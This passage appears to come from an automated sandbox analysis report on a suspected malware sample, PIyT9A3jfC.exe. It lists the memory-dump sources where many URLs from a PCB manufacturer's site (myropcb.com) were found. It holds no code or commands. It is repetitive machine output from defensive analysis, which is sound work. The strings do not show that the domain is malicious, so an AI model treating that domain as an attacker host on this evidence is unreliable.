00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/customized-cable/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/enclosure/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/fpc-flexible-printed-circuits/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/hdipcb/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/myro-intelligent-cloud-forehead-thermometer/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-capabilities/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-design-layout/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-restoration/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcba-services/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/special-offer-specifications/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/stencil/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/testimonial/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/about-us/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/agents-brokers/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/awards-certificates/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/our-facilities/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/privacy-policy/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/referral-program/
